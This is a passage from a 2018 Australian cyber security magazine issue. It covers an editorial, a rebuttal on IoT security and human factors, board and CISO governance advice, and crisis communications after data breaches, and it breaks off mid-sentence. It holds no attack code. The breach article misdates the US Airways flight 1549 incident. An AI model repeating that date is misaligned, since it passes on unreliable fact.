THE MAGAZINE FOR AUSTRALIAN INFORMATION SECURITY PROFESSIONALS | www.australiancybersecuritymagazine.com.au
@AustCyberSecMag Issue 4, 2018
Cover features: Protect your reputation after a breach; Cryptocurrency Insecurity; Ethereum Blockchain Identity Management; Can we take people out of IoT Security?; Breach notification isn’t just about breach notification; Spectre and Meltdown; Hybrid Forensics; Who is the most offensive tester in the room?
Contents

Editor's Desk, p. 5
Feedback loop - have your say!
Helping Australia build a secure healthcare network
Spectre and Meltdown, p. 8
Can We Take People Out of Internet of Things Security, p. 10
The ASX 100 Cyber Health Check Report, p. 21
Protecting your reputation, p. 16
Spectre and Meltdown, p. 22
XSSposing bugs via Shockwave Flash analysis, p. 30
Moving to Silicon Valley, p. 32
Fortinet’s security transformation plans, p. 34
Hybrid forensics, p. 38
Who is the most offensive tester in the room, p. 42
Now what? I have to notify the OAIC?, p. 44
AISA member focus, p. 46
Executive Editor’s interview (Extract) with David Kemp, p. 52
Breach notification isn’t just about breach notification, p. 54
Everything you need to know about breach notifications, p. 56
Cryptocurrency Insecurity, p. 58
How India is coping with cyberthreats?, p. 62
SMART ID: Ethereum blockchain identity management, p. 64
Cyber Insurance - A Buyer's Guide Part 3, p. 66

Editor: Tony Campbell
Director & Executive Editor: Chris Cubbage
Director: David Matrai
Art Director: Stefan Babij

Marketing and Advertising: T | +61 8 6465 4732, promoteme@australiancybersecuritymagazine.com.au
Subscriptions for Australian Security Magazine: T | +61 8 6465 4732, subscriptions@australiansecuritymagazine.com.au

Copyright © 2017 - My Security Media Pty Ltd, 286 Alexander Drive, Dianella, WA 6059, Australia. T | +61 8 6465 4732, E | myteam@mysecuritymedia.com, www.mysecuritymedia.com

All material appearing in Australian Security Magazine is copyright. Reproduction in whole or part is not permitted without permission in writing from the publisher. The views of contributors are not necessarily those of the publisher. Professional advice should be sought before applying the information to particular circumstances.

Connect with us: @AustCyberSecMag, www.facebook.com/apsmagazine, www.linkedin.com/groups/Asia-PacificSecurity-Magazine-3378566/about, www.youtube.com/user/MySecurityAustralia. Like us on Facebook and follow us on Twitter and LinkedIn. We post about new issue releases, feature interviews, events and other topical discussions.

Correspondents* & Contributors: Dan Lohrmann, Micheal Trovato, Wayne Tufek, Elliot Dellys, Jason Magic, Graeme Speak, David Stafford-Gaffney, Samantha Humphries, Guillaume Noé, Mark Luckin, Richard Adams, James Wooton, Annu Singh, Mark Jones, Sarosh Bana*

My Security Media sites: www.australiansecuritymagazine.com.au, www.asiapacificsecuritymagazine.com, www.aseantechsec.com, www.drasticnews.com, www.chiefit.me, www.cctvbuyersguide.com
Editor's Desk

Welcome to Issue 4 of the Australian Cyber Security Magazine. It’s hard to believe that we are already into April – Christmas seems like it was yesterday. Cyber security has again been in the headlines over the past few months – let’s face it, these days it’s rarely not in the news – with several large-scale incidents, such as the one that affected Equifax, capturing much media attention. Globally, ransomware still dominates our incident response efforts, but the rise of cryptomining (more on that later) has become a modern irritation, where stealing CPU and GPU cycles – and electricity – is the new scourge affecting businesses and home users alike.

Here in Australia, we’ve seen the introduction of new cyber security legislation mandating that certain kinds of data breaches relating to personally identifiable information (PII) must now be notified to all affected customers and to the Office of the Australian Information Commissioner (OAIC). This new legislation is vague and is causing concern amongst the business community, since it’s often hard to determine what’s included and what is not, and what constitutes a reportable breach. Following on from the last issue, we have gathered together some more articles containing practical advice and guidance on mandatory breach notification, to help you understand what you need to do in advance to prepare for such an incident.

We had feedback last year that we didn’t have enough technical security articles, so we’ve taken that advice on board and included deeper investigations into forensics, malware analysis and a technical analysis of Shockwave Flash. We’re privileged to hear from Richard Adams, who explains hybrid forensics, an approach designed to address the problems of dealing with massive data volumes and large networks, and regular author Guillaume Noé walks us through the issues faced by investors looking to get in on the cryptocurrency gold rush.
It’s funny when we look at the latest threat faced by businesses, insomuch that it’s a wonder this hasn’t happened before. Cryptomining is the unauthorised installation of cryptocurrency mining applications, either on a website, where the mining runs as illicit script in visitors’ browsers, or on corporate systems, where rogue system administrators install cryptomining software on the systems they look after to steal processing time and electricity from their places of work to mine for bitcoin (or any number of other alternative currencies). We decided to commission some blockchain articles for this issue, since it’s such a hot topic now and has a connection to cyber security in that the underlying technology is a public key infrastructure model of distributed trust. Cryptocurrencies are the primary application focused on by the public and media today; however, the blockchain ecosystem has unfathomable application in the real world, not restricted to currency and moving financial value from one party to another. Annu Singh’s article, Smart ID: Ethereum Blockchain Identity Management, looks at how Smart ID running on the blockchain ecosystem known as Ethereum offers a viable option for individuals, corporations and governments for introducing efficiencies into the process lifecycle of identity management. Prime examples are in land sales and electronic passports, so Annu explains how this works and enlightens us on how wide the applicability of this new technology really is.

James Wooton, one of Sydney’s most experienced penetration testers, talks us through the decision-making process for hiring testers, while Mark Luckin runs through several interesting scenarios relating to cyber insurance payouts in the third instalment of his series on cyber insurance. Finally, Graeme Speak, CEO of Australian cyber start-up BankVault, talks about his journey to Silicon Valley and explains why he’s relocated offshore to further build his business. This is a fascinating story and has a few hard lessons for those trying to encourage start-ups to stay at home. We hope you enjoy this issue of the ACSM and, as usual, we welcome your comments, suggestions and requests for things you’d like us to cover in the future. Until next time, stay vigilant and keep yourself cyber-safe.

Tony Campbell, Editor
WRITE FOR US! The Australian Cyber Security Magazine is seeking enthusiastic cyber security professionals who are keen on writing for our magazine on any of the following topics:
• Digital forensics in Australia
• Workforce development
• Security in the development lifecycle
• Threat management and threat hunting
• Incident management
• Operational security
• Security book reviews
• Risk management
• True crime (cybercrime)

Reach out to over 10,000 industry professionals per month!

If you are interested in writing for us, please send your article pitches (no more than 200 words) to the editors’ desk at: editor@australiancybersecuritymagazine.com.au

Interested in Blogging? You may or may not be familiar with our website, which also provides daily infosec news reviews, as well as our weekly newsletters. We’d like to hear from anyone who’d be interested in contributing blog posts for our platform that reaches over 10,000 industry professionals per month, where you can express your opinions, preferences, or simply rant about the state of the cyber security world. If you stay on topic and stick to the facts, we’ll be happy to publish you. If interested, email the editors at: editor@australiancybersecuritymagazine.com.au
FEEDBACK LOOP - Have Your Say!

There are many ways that you can provide feedback to us and converse with our editorial board, but we’re establishing this regular feature in the Australian Cyber Security Magazine because conversations can change the world. It is encouraging to see that so many of you are already so vocal on some of the big issues affecting Australia, voicing your opinions on LinkedIn, blogs and at industry conferences. We will endeavour to respond to every single one of you and publish the best discussion pieces in each issue in this new standing section, entitled Feedback Loop.

To thank you for your feedback, we’ll provide a token of our appreciation for the best letter in every issue. As this is the inaugural issue we don’t have any feedback yet, so let’s cut to the chase. The prize for the best letter in issue 4 will be a complete set of social engineering guru Chris Hadnagy’s three amazing books.
Phishing Dark Waters: The Offensive and Defensive Sides of Malicious Emails An essential anti-phishing desk reference for anyone with an email address. Phishing Dark Waters addresses the growing and continuing scourge of phishing emails, and provides actionable defensive techniques and tools to help you steer clear of malicious emails. Phishing is analysed from the viewpoint of human decision-making and the impact of deliberate influence and manipulation on the recipient. With expert guidance, this book provides insight into the financial, corporate espionage, nation state, and identity theft goals of the attackers, and teaches you how to spot a spoofed e-mail or cloned website. Included are detailed examples of high profile breaches at Target, RSA, Coca Cola, and the AP, as well as an examination of sample scams including the Nigerian 419, financial themes, and post high-profile event attacks. Learn how to protect yourself and your organization using anti-phishing tools, and how to create your own phish to use as part of a security awareness program.
Unmasking the Social Engineer: The Human Element of Security The Human Element of Security focuses on combining the science of understanding non-verbal communications with the knowledge of how social engineers, scam artists, and con men use these skills to build feelings of trust and rapport in their targets. The author helps listeners understand how to identify and detect social engineers and scammers by analysing their non-verbal behaviour. Unmasking the Social Engineer shows how attacks work, explains nonverbal communications, and demonstrates with visuals the connection of non-verbal behaviour to social engineering and scamming.
Social Engineering: The Art of Human Hacking The first book to reveal and dissect the technical aspect of many social engineering manoeuvres. From elicitation, pretexting, influence and manipulation, all aspects of social engineering are picked apart, discussed and explained using real-world examples, personal experience and the science behind them, to unravel the mystery of social engineering.
Australian Cyber Security Magazine | 7
Cyber Security
Can we take people out of IoT security?

By Dan Lohrmann

How can we provide better security for Internet of Things (IoT) devices? Yevgeny Dibrov writes that cybersecurity can be improved solely with technology improvements. I disagree. Here’s why I believe removing people from IoT security is ‘mission impossible.’

I recently read an intriguing Harvard Business Review (HBR.org) article by Yevgeny Dibrov, titled: The Internet of Things is Going to Change Everything About Cybersecurity. This well-written and thought-provoking opinion piece begins with the reality that cyber threats are exploding globally and data breaches have led mainstream businesses to spend over $93 billion in 2017 on stopping cybercrime. Furthermore, cyberattacks against Internet of Things (IoT) devices are skyrocketing even faster, causing Congress to get involved. Gartner anticipates that a third of hacker attacks will target "shadow IT" and IoT by 2020. In our scary new normal online, I certainly agree with Dibrov that: “Executives who are preparing to handle future cybersecurity challenges with the same mindset and tools that they’ve been using all along are setting themselves up for continued failure.” No doubt, old methods of defending enterprises from cyberattacks are failing and new security solutions are certainly needed. So, what is the author’s solution?
Answer: Take people out of the security equation. Dibrov writes: “It can’t be denied, however, that in the age of increased social-engineering attacks and unmanaged device usage, reliance on a human-based strategy is questionable at best… It only took one click on a link that led to the download of malware strains like WannaCry and Petya to set off cascading, global cybersecurity events. This alone should be taken as absolute proof that humans will always represent the soft underbelly of corporate defenses. …” The article goes on to explain that the “Amazon Echo is susceptible to airborne attacks,” and “Users may have productivity goals in mind, but there is simply no way you can rely on employees to use them within acceptable security guidelines. IoT training and awareness programs certainly will not do anything to help, so what’s the answer? It is time to relieve your people (employees, partners, customers, etc.) of the cybersecurity burden.”

My Response: Wrong answer. While I certainly agree that humans are often the weakest link in online security and we must do better at equipping staff, relieving your people from the cybersecurity burden is going in the wrong direction. People use the technology, and their actions, and the processes that are followed, will always be essential components of effective security strategies with the myriad new Internet of Things devices. The conventional wisdom remains true that solutions must involve people, process and technology answers. As I have written in the past, most experts say the largest percentage of our security challenges involve user actions (or interactions). Nevertheless, I am willing to concede that the percentage breakdown assigned to each category is open to debate and may be different for various products, services, companies and/or IoT devices.

But before I explain in more detail why I part ways with the respected CEO and co-founder of Armis, I want to say that I certainly agree that we need much better security built into IoT devices. I certainly think IoT security is at the cutting edge of cyber issues, and I share Dibrov’s sceptical view that we can keep doing the same things and get different results — in all three categories. Without hesitation, almost everyone except criminal hackers would love to have IoT devices ship “secure by default” or “secure by design” with a hack-proof seal of approval on every IoT box that ships. There is no doubt that much more needs to be done with the security built into all technology, and it would be great if we could drastically reduce IoT security flaws and the potential number of mistakes that can be made by end users. However, pitting effective security awareness training and/or a positive security culture against better technology is a serious mistake and ultimately leads down a path to dismal failure. History has taught us that lasting security answers must include “all of the above,” with people, process and technology working together well.

A Short History Lesson Regarding Cybersecurity
As I ponder these concepts, and especially promises of more IoT security built in up front, I can’t help but think back more than a decade to the Bill Gates promise of better security. Here’s a very brief history reminder from the days of Microsoft’s Trustworthy Computing. On Jan. 23, 2003, Bill Gates wrote these well-known "Secure by Design" words: “Secure by Default: In the past, a product feature was typically enabled by default if there was any possibility that a customer might want to use it. Today, we are closely examining when to pre-configure products as "locked down," meaning that the most secure options are the default settings. For example, in the forthcoming Windows Server 2003, services such as Content Indexing Service, Messenger and NetDDE will be turned off by default. In Office XP, macros are turned off by default. VBScript is turned off by default in Office XP SP1. And Internet Explorer frame display is disabled in the "restricted sites" zone, which reduces the opportunity for the frames mechanism in HTML email to be used as an attack vector. …”

While I applauded these laudable goals more than a decade ago, along with other important steps taken by Microsoft to improve security, the sad truth is that many hundreds of "Patch Tuesdays" have come and gone, with more hacked systems than ever before in 2017. The promise of “secure by default” is far from reality across the technology industry: software, hardware and even cloud-hosted services. Beyond Microsoft, other companies have the same issues with technology bugs and security holes that hackers eventually find. Even when technology products ship with all security settings enabled, which is not the case with many IoT devices, end users often turn off security features, fail to download critical security updates, or don’t follow recommended practices such as changing default passwords.
Yevgeny Dibrov is not the first one to suggest that technology can be made secure regardless of people’s actions, and he won’t be the last. However, I am somewhat surprised that this viewpoint remains popular as we head into 2018. Why? Beyond software development flaws, we have witnessed decades of insider threats caused by people like Edward Snowden and others who were able to use processes and weaknesses in people to overcome sophisticated data protections. There is simply no way that IoT manufacturers will spend the kind of dollars on security that the National Security Agency (NSA) spends on technology to protect national secrets. And yet, even those technology defenses were able to be defeated by social engineering weaknesses exploited by Snowden — such as colleagues giving away their passwords. External hackers use those same techniques today, as demonstrated at security conferences like RSA. Recent cyberattacks against bitcoin exchanges represent another example of how attacks will go after weaknesses in people and process, despite solid technology which is supposedly "hack-proof." Just last week a South Korean bitcoin exchange declared bankruptcy after the second attack in less than a year. This happened even as commentators still maintain that the bitcoin currency cannot be hacked. Perhaps true, but your bitcoin wallet can still be raided. Similar problems will continue to occur with IoT devices in the future.
Fun Movie and TV Examples to Help Understand the Role of People in Security

I want to recognize that Dibrov says: “It may be prudent, and required, for you to continue with awareness programs, but you will have to rely more on intelligent technologies and automation if you hope to have any chance at success. …” I certainly agree. Nevertheless, the reality is that the main point of his article comes from the last sentence at the end of the article: “It’s time to remove people from the discussion and move towards a more intelligent, secure future.” Really? Take people out of the security discussion? Side note: I immediately posted this article to my LinkedIn and Twitter feeds and received a flood of similar comments to what I am writing in this rebuttal. Some of those same comments from colleagues appear at the bottom of the article at HBR.org.

Furthermore, to keep this simple, I’d like to offer a fun illustration of why people cannot be removed from the central security discussion. In the (fictional) film series Mission Impossible, the most sophisticated technical security controls are consistently overcome via weaknesses exploited in people and process hacks. Ethan Hunt (played by Tom Cruise) and a wide assortment of men and women spies in the fictional U.S. Impossible Mission Force (IMF) face an untold number of highly improbable and dangerous tasks that are action-packed, over-the-top and fun to watch. One common theme throughout these five movies (with number six coming in 2018) is how people can still defeat the most sophisticated technology safeguards put in place. Sadly, hackers overcoming state-of-the-art technology defenses are not just for the movies or TV shows like Mr. Robot. We have seen an untold number of ways that IoT devices can be hacked by tricking people into doing things or not following recommended best practices for security. Sadly, hacking IoT devices is often easier than Tom Cruise pulling off one of his movie stunts.
Everyone certainly agrees with the goal to build more-secure IoT devices. Humans certainly make mistakes, and we should aim to automate as much security as possible. Just as we safely fly planes on autopilot, shouldn’t we strive to build human-proof smart devices that are secure out of the box? Of course. And ... I am all for more-secure IoT devices that remove the potential for most end-user errors or security mistakes. Nevertheless, training and working with people and processes to protect data will never be an optional extra for secure enterprises, homes or individuals.
A False Choice

The HBR article by Yevgeny Dibrov appears to offer an attractive answer because it promises IoT security solutions without the very hard work of changing enterprise security culture. It offers a false hope by eliminating “reliance on a human-based strategy” and offering better security with a perfect technology-driven, or bolt-on tech solution, for all IoT devices. Managers imagine saving significant money by reducing the time required for staff to be trained and/or understand and implement appropriate (and secure) business processes with innovative technology. This invented conflict is similar to another security paradox from a few years back that asked the question: Are data breaches inevitable? Most people now say "yes" without hesitation, but Invincea CEO Anup Ghosh told Washington news site DC Inno that breach prevention is possible, proclaiming “breach inevitability” is just marketing. As I wrote at that time, we need a third answer that adopts all the wisdom contained in the NIST Cybersecurity Framework regarding cyber incident and data breach prevention as well as incident response. The same holistic approach is required for IoT security. Let’s not sacrifice one security best practice in exchange for another, as if we need to pick technology protections over enabling people with better awareness training and engaging in cyber exercises. The NIST guidance encourages an assessment of all cyber-risks with prioritization based upon your specific situation. It recommends that solutions contain end-user training, technical training for developers and system administrators, cybersecurity exercises, management briefings, repeatable technology upgrade processes and much more. Don’t skip over important sections of the NIST Cyber Framework.
Final Thoughts

Better cybersecurity protections for IoT require improvements in people, process and technology. So, let’s not pit people issues against technology protections in a fight for dollars — nor pretend that a perfect black box is coming that will enable IoT nirvana, while removing people and process from the security equation. Bottom line: The Edward Snowden story can teach many important security lessons. But no security message is more central than this: People, and their actions, will always matter in cybersecurity. So, can we remove people from the IoT security discussion? Mission Impossible!
The ASX 100 Cyber Health Check Report. What’s next for your board - PART II

By Micheal Trovato

Shortly after the release of the ASX 100 Cyber Health Check Report, I wrote about the next steps for boards. Although the arc of progress described in the ASX Report is tilted towards goodness, it is also clear much needs to be done. At that time, I recommended:

1. Make sure the board has sufficient cyber security expertise or advisors;
2. Encourage your Chief Information Security Officer to build governance skills in finance, risk, strategy, legal, and compliance;
3. Use the results of the ASX Report for discussion at your next board meeting;
4. Commence or update your organisation’s detailed cyber security strategy and report on the security transformation program regularly;
5. Include cyber security as a quarterly agenda item, or more often as needed;
6. Measure your board’s performance in this critical area; and
7. Learn from peers on other boards.

Last time I focused on the experience and expertise of the board. Most importantly, expertise at a board level comes from knowing the “that, how, and why” of cyber security and having the right practical experience. This implies having an experienced cyber security person on the board, audit and risk committee, or as an advisor to the board. In this article, I want to focus on the Chief Information Security Officer’s experience and the board. Many organisations are putting well qualified cyber security skilled people in CISO or CISO-light roles and then expecting them to be well rounded and able to interact with boards or their committees. Regrettably, these CISOs function with a lot of day-to-day stress, in roles that are within organisations that have values and cultural misalignments, without sufficient mandate from the executive or board, and without resources to execute effectively. All this in an environment that is so fraught with danger that any CISO should sign on only with a 6-12-month redundancy package. Why? After a breach, the organisation may feel it necessary to make a statement to stakeholders that it is doing something, even if it is not the fault of the CISO. Their jobs are in jeopardy daily, and the gap between the board’s understanding of and experience with privacy and cyber security compounds the difficulty of communicating and working with the CISO.
The ASX 100 Cyber Health Check Report, as a baseline – where is the CISO?

The ASX Report says that it “can act as a baseline where companies can see how they rate against their peers and can take practical steps to improve their cyber security.” Further, in the report, cyber security is often the domain of the board’s audit or risk committees (64% of respondents), allowing a subset of directors with relevant skills to focus on cyber risk. Considering the maturity of cyber security governance in Australia, this is the result I would expect, and those committees are probably the most qualified to evaluate cyber risk. The ASX Report did not go to the next level – looking at the most senior cyber executive – and while the board’s job may stop at hiring the CEO, who then hires the CISO, there was no view as to the CISO’s capabilities. This was a disappointment, as this person is critical to the organisation.
It depends on your CISO’s capabilities and strategic industry focus…

While retained search firm Russell Reynolds (RR) carried out cyber search assignments, they realised that while there had been considerable progress on defining standards and approaches for dealing with cyber security, including the widely adopted US NIST cyber security framework, there was little clarity on understanding what “good” looked like in the leadership of the cyber security function. Cyber security is a pervasive risk and an arcane, deep, and fast-moving area of knowledge, and CISOs are expected to understand the “that” and the “how”, as well as the “why” of cyber security. But many struggle to communicate and work with business leaders and boards and give the benefit of their experience, hampered by their lack of similar board experience or soft skills.
Russell Reynolds CISO Assessment Level Model (CALM)
http://www.russellreynolds.com/insights/thought-leadership/cyber-security-the-ciso-assessment-level-model-calm

Russell Reynolds developed a CALM Model that shows four levels of CISO: Level 1 (the lowest level) represents about 60% of the market and Level 4 represents less than 100 people worldwide, most of whom are in the US. Level 1s are mostly existing heads of IT security and are largely focused on governance and controls. Level 4s are deeply intimate with their businesses; they are involved in the background, in senior hirings and firings, M&A, divestments, supply chain, IP protection and anything shareholder sensitive. They also have regular sessions with the chairman of the main board and train non-executives.

They recommend that organisations start with the question, “What level of CISO do you have?” and ask yourself what is the current organisational attitude towards cyber. Then assess the current role/person against the CALM Model and determine what level CISO the organisation has. Then ask where the organisation wants to get to, and over what period does it want to get there? Then work out what approach is currently taken to cyber risk management in the organisation. You now have a good view on how sophisticated the organisation currently is in its thinking and approach to cyber security. Next, look at the table that focuses on what a CISO does. Work your way down the table through some of the observations and see if you can figure out either what the current capability of the CISO is, or what the future requirement will be. You now have a more refined view of what level of CISO is most likely to succeed in the organisation going forward.
Cyber Security
Is that enough? While organisations continue to evolve these roles, sometimes upgrading the role a couple of times over the years as part of the process, they often neglect the well-roundedness of the role. I’ve had the benefit of working in the industry for 10 years and 20+ years in “Big 4” firms as a consulting partner in the US and Australia. As part of my career journey, I earned an MBA in Accounting and Finance and a BS in Management Science, Computing, and Psychology. And along the way, I had multiple opportunities to gain experience in governance and risk at the board and executive level – building the financial, legal, strategy and risk skills as well as the ability to analyse, synthesise and communicate. Many CISOs, due to their technology and operations career paths, have not had this experience – but it is critical that they be willing to step away from some of the technical aspects of information security, while keeping up to date with technical knowledge and certifications, and learn business language and softer communication and presentation skills. Some suggested key activities:
1. Read the AFR, Wall Street Journal, FT or other business publications that build business knowledge; learn to speak the language of business and understand today’s issues.
2. Increase your education and training in business – an MBA is a good choice.
3. Do a stint in a consulting firm – while many people may find this a big leap, the experience gained is invaluable.
4. Graduate from the Company Directors Course from the Australian Institute of Company Directors (AICD) or similar in your geography.
5. Join ISACA or ISC2 and obtain certifications like CISM or CISSP to demonstrate credentialed trust, risk and governance skills and leverage your technical skills – regulators may soon require this.
6. Join non-profit boards and gain the experience of being on boards – ideally doing something that you love to do – you may even discover a new career.
7. Develop relationships with executives so they are aware of your knowledge and skills, will begin to trust you, and will see you as a good choice for an executive position.
That last item offers an interesting side-bar. Boards need to get comfortable with two things:
1. That potential cyber-security-skilled board members or CISOs are not a danger. Let’s face it – with the level of leaking going on and the high-profile debacles caused by possibly well-intentioned but questionable individuals and values – should they trust us? In the end they will need to, and it will be to their advantage – but being able to empathise with and understand what a board must do to vet candidates is critical.
2. They must understand how we will bring value. This will be difficult if they can’t see a person who can contribute across all areas of board competence – not just with respect to cyber security expertise.
Most boards today are outgunned by cyber criminals. Getting the right knowledge and experience integrated into the board and the CISO will be essential to achieving the desired outcome of organisational resilience. There is much work still to be done.
Australian Cyber Security Magazine | 15
Protect your reputation after a breach
By Wayne Tufek
Data breaches expose everything from government identifiers to user account log-in names and passwords. Criminals can use the stolen information, such as name, address and date of birth, to file false tax returns, order credit cards and take money from bank accounts. If you use the internet and have provided your personal details, you’re most likely a victim of at least one data breach. Data breaches are inevitable, and waiting for a breach to occur before designing and testing an incident response plan is a recipe for failure. It’s now a question of when your organisation will be breached and how you will respond, not if you will be breached. 100% prevention simply doesn’t exist, so having a plan to deal with a security breach is now more important than ever. You probably already have an incident response plan from a technical perspective, with defined phases such as preparation, identification, containment, eradication and lessons learned. Given the severe reputational damage that can arise from a high-profile data breach, a marketing and communications plan alongside the technical response plan is now a necessity. Security heads must now learn about public relations and crisis management, as the changing facets of information security force the role to move from technologist to business leader and risk manager. As the role changes, you must now consider, in the event of a breach, what is required for communication to your customers, regulators, shareholders and the general public. What will be communicated, how it will be communicated and what will be done to remedy the situation must all be communicated quickly, across multiple mediums, to the right audience. Honesty, transparency and accepting accountability are key to successfully saving your organisation’s reputation in the court of public opinion. Breaches are inevitable, but data theft is not. Remember, focusing on all five elements of a comprehensive security program – identify, protect, detect, respond and recover – will provide full-circle protection and allow you to manage your risk. In AON’s 2015 Global Risk Management Survey (http://www.aon.com/2015GlobalRisk/) the number 1 risk that keeps senior managers and risk leaders awake is “damage to reputation and brand”. Interestingly, at number 7 was “business interruption” and at number 9 was “computer crime/hacking/viruses/malicious codes”. An information security breach can certainly give rise to numbers 1, 7 and 9 of the top ten risks. Whilst every incident that becomes a crisis must be handled in a different way, there is one factor common to all crises, and that is communication. How communications are handled with your stakeholders is critical in protecting your organisation’s
reputation. How an incident is communicated can either significantly help or hurt how affected customers, employees and shareholders view the company. A crisis in itself can create three types of threat: a threat to public safety, a financial loss to the organisation and/or a loss of reputation. Ordinarily, information security professionals have not had to think too much about public safety, but as more and more smart devices become connected to physical infrastructure, cyber-attacks will have an increasing and potentially devastating impact on the physical world. Some industries will see this before others, such as transport management systems, vehicles (think driverless cars) and hospitals. What is inevitable is the convergence of physical security and information security. Physical security is concerned with the safety and preservation of life, and it will now be part of the purview of the information security professional. A failure in information security may result in the loss of human life, so as information security professionals we can no longer consider security to be just about the confidentiality, integrity and availability of information. In early 2016, law firm Mossack Fonseca experienced a huge data breach. Eleven million documents were leaked, revealing the details of how the rich and famous use tax havens to hide their wealth. The fallout from the breach included the resignation of the Prime Minister of Iceland, for not declaring ownership of a substantial company shareholding. If you needed tax advice, would you go to Mossack Fonseca? I’m thinking you wouldn’t. Loss of or damage to an organisation’s reputation is the number one risk that keeps senior business managers awake at night. Reputation and brand are closely related but different, even though the terms are sometimes used interchangeably. Brand is owned by an organisation. It is the organisation’s promise to its people; it is what the organisation would like its stakeholders to believe is true. Reputation, on the other hand, is owned by the organisation’s stakeholders; it is their collective perception of what they believe to be true. An organisation’s reputation strengthens its brand, but brand does not greatly influence reputation. A data breach in a worst-case scenario will turn into a crisis. When responding to security incidents, it’s often a case of Murphy’s Law – “what can go wrong, will go wrong, in the worst possible way”. In this type of situation, it is important to protect your organisation’s reputation by communicating the right message, to the right people, at the right time. A key part of crisis management is to have a plan and update it annually. Have a designated team where each member has defined responsibilities. Test the plan annually; this is very important. If you’ve never tested your plan, how do you know that it works? How will the people involved in responding to the incident know what to do if they haven’t had a chance to practise? The table below provides some help in determining and assigning tasks and explaining who will do what part of the communications data breach response. It should be used as a guide and tailored to your individual organisation as required.
Each of the actions is explained below:
• Advises: This individual or group provides input into the steps to be completed or the process to be performed.
• Owner: The individual or group that administers, oversees or manages the process, function or steps.
• Implements: The individual or group that performs the function, steps or actions in accordance with the owner’s wishes.
• Updates: This party receives updates on status and progress from the Owner.

| Activity | CMO | CEO | Comms Manager | CIO | CFO | COO | CISO | Legal Counsel | CHRO |
|---|---|---|---|---|---|---|---|---|---|
| Form the team | Owner/Implements | Updates | Updates | Updates | Updates | Updates | Updates | Updates | Updates |
| Determine incident facts and current status | Updates | Updates | Updates | Owner | Updates | Updates | Implements | Updates | Updates |
| Obtain outside PR/comms assistance | Advises | Updates | Owner/Implements | Updates | Updates | Updates | Updates | Updates | Updates |
| Obtain outside IR assistance | Updates | Updates | Updates | Updates | Updates | Updates | Owner/Implements | Updates | Updates |
| Prepare communications | Advises | Advises | Owner/Implements | Advises | Advises | Advises | Advises | Advises | Advises |
| Approve communications | Advises | Owner | Advises | Advises | Advises | Advises | Advises | Advises | Advises |
| Notify OAIC? | Advises | Advises | Advises | Advises | Advises | Advises | Advises | Owner | Updates |
| Issue communications via channels | Updates | Updates | Owner/Implements | Updates | Updates | Updates | Updates | Updates | Updates |
| Monitor social media and stakeholder reactions | Updates | Updates | Owner/Implements | Updates | Updates | Updates | Updates | Updates | Updates |
You should consider using an outside public relations firm if you don’t have the skills in-house. A crisis can be defined as the “sudden and unexpected creation of victims, accompanied by unplanned visibility for the organisation”. A serious data breach can certainly meet this definition; the release of personal information can lead to identity theft, in some cases (depending on the information) extortion, and in a worst-case scenario suicide (http://www.abc.net.au/news/2015-08-25/ashley-madisonhack-two-people-may-have-committed-suicide/6721840). To prepare, pre-draft your crisis messages and website content ahead of time. Mounting a response to a data breach begins long before the breach actually happens. A key challenge in a crisis is to minimise negative or hostile media coverage that can undermine the confidence of your customers, employees, shareholders and business partners. Your communications should be quick to establish you as the best source of information regarding the breach, explaining what has happened, what your organisation is doing to fix the problem and how you’re keeping any victims safe. In a crisis situation, most commonly, a “holding statement” is issued as soon as possible. A holding statement provides the media with an initial statement that sets out the basic facts about the incident and lets people know that you’re dealing with the situation. The holding statement should contain as much factual information as is available, however limited it may be, together with a firm commitment to provide further information when it comes to hand. Your statement should describe the immediate steps that have been taken and what you intend to do next. The most important aspect of a holding statement is to be honest. Aim to establish and maintain credibility by acknowledging the facts. Your credibility will depend on your audiences’ assessment and perception of your level of honesty and sincerity, so if credibility is lost, trust is lost also. Acknowledge that the information you have is incomplete and may change over time as your investigation continues. When drafting your holding statement, consider the following:
• Define and introduce your spokesperson – who are they exactly?
• Keep the statement short and simple, for example, “We understand that there has been a data breach”.
• Explain what your priorities are: “We are working to limit any damage or harm to our valued customers”.
• Explain that the appropriate authorities have been contacted, for example law enforcement and specialist forensic investigators (if applicable).
• Reassure the public of your priorities and assure the public and media that you will keep them updated as more information comes to light.
Prior to an incident, ensure that you have told your people how to respond to questions from the press and media, something along the lines of, “Thank you for your question. I am not a designated spokesperson for the company; please go to www.companywebsite.com.au or contact our communications team”. A statement must always express regret about the situation and be clear on what information you can provide at this time and what cannot be provided. Ensure that you provide a consistent message across all channels, from the company website to your intranet (don’t forget about your employees) and social media. Prepare your call centre for an influx of calls and provide them with a script to ensure that everybody is sending a consistent message. The use of a call centre is important, as those affected must be able to speak to a live person rather than a machine; try to keep wait times to a minimum. All technical incident response plans must be designed to answer 6 questions; the answers to these questions will allow you to craft your messages and identify who your audiences are.
1. What systems and data have been affected?
2. How did the attackers do it?
3. Who did it?
4. Is it over?
5. Can it happen again? If so, how?
6. How can we stop it from happening again?
In order to communicate what has happened to your stakeholders, it is important to gather and understand all the facts of the breach inside and out. Understand and identify who is impacted and affected, because in turn you’ll use this information to develop your communication messages around those individuals and/or groups. Incidents can be very challenging, and having a complete picture of what happened, who did it and why may take days or weeks and require specialist skills that your in-house team does not have. Consider using specialist incident response resources if your in-house team doesn’t have the right skills and knowledge. Better still, have them on retainer. The time taken to ensure that the right contracts are in place before an incident will let you sleep better at night. You don’t want to be in a situation where you’ve just had a data breach and you’re negotiating contractual terms with the people who can help you the most. When a crisis or bad news strikes your organisation, the first place that the outside world will turn to for information is your company’s website.
There won’t be time to construct a new site from scratch, so consider creating a “dark site” ahead of time. A dark site is a prebuilt website that can be activated when needed. A dark site positions your organisation as the primary source of information about the crisis; it signals to the news media that you intend to provide timely and accurate information, and it demonstrates that you’re in control and taking your responsibilities seriously. In general, your dark site should list all available facts, any special instructions as to what those impacted should do, what steps your organisation is taking and any relevant contact information. On June 15, 2009, US Airways flight 1549 left New York airport and hit a flock of geese, causing the loss of both engines. The plane made an emergency crash landing into the Hudson River; all 155 people survived the harrowing ordeal due to the skill and quick thinking of the pilot, Capt. Chesley “Sully” Sullenberger. This event helped Twitter become a social media powerhouse and it changed the way that the news is reported. The man who started it all is Janis Krums, who tweeted, “There’s a plane in the Hudson. I’m on a ferry going to pick up the people. Crazy”. He tweeted that to his 170 followers. Exactly 32 minutes later he was being interviewed live on MSNBC, and later his photo appeared on the front page of national newspapers. Twitter co-founder Jack Dorsey told CNBC in 2013, "Suddenly the world turned its attention, because we were the source of news—and it wasn't us, it was this person in the boat using the service, which is even more amazing!" The news no longer breaks, it tweets. Social media is an umbrella term applied to web-enabled applications that are built around user-generated and user-manipulated content, such as wikis, podcasts and social networking 